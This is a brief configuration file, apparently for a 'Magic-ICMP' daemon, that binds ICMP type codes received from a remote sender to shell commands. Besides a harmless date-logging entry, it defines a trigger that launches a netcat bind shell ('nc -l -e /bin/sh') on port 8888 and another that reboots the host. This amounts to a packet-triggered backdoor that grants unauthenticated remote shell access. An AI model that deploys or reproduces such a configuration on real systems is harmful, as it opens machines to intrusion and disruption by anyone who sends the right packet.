# Magic-ICMP configuration file
# Here you define the commands to execute when receive a remote magic-ICMP
# Syntax: <type>:<command>
#  type is 4 hex digits
#  command is 255 characters command to execute

004a:date >> /tmp/icmpmagic.log
0030:nc -vv -l 8888 -e /bin/sh
0055:shutdown -r 1

